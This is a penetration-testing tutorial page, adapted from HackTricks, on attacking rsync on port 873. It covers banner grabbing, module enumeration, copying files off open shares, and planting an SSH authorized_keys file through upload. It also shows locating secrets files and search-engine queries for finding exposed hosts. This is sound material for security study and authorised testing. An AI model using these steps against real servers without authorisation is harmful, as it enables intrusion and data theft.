---
title: "873 - Rsync"
weight: 873
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **学习提示**: 本文档介绍 **873 - rsync** 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

---

**默认 port:** 873

```
PORT    STATE SERVICE REASON
873/tcp open  rsync   syn-ack
```

### 信息收集

#### Banner & Manual communication

```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection

#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
```

#### **Enumerating Shared Folders**

**Rsync modules** are recognized as **directory shares** that might be **protected with passwords**. To identify available modules and check if they require passwords, the following commands are used:

```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

## Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```

Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message.

#### [**暴力破解**](../generic-hacking/brute-force.md#rsync)

#### Manual Rsync 用法

Upon obtaining a **module list**, actions depend on whether authentication is needed. Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through:

```bash
## Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name

## Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```

This process **recursively transfers files**, preserving their attributes and permissions.

With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear:

```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```

To **upload content**, such as an _**authorized_keys**_ file for access, use:

```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```

### POST

To locate the rsyncd configuration file, execute:

```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```

Within this file, a _secrets file_ parameter might point to a file containing **usernames and passwords** for rsyncd authentication.

---


### 搜索引擎语法

#### FOFA

```bash
# FOFA 搜索语法
port="873"
```

#### Shodan

```bash
# Shodan 搜索语法
port:873
```

#### ZoomEye

```bash
# ZoomEye 搜索语法
port:873
```

---

## 📖 参考资料

- [HackTricks - 873-rsync](https://book.hacktricks.wiki/en/network-services-pentesting/873-rsync.html)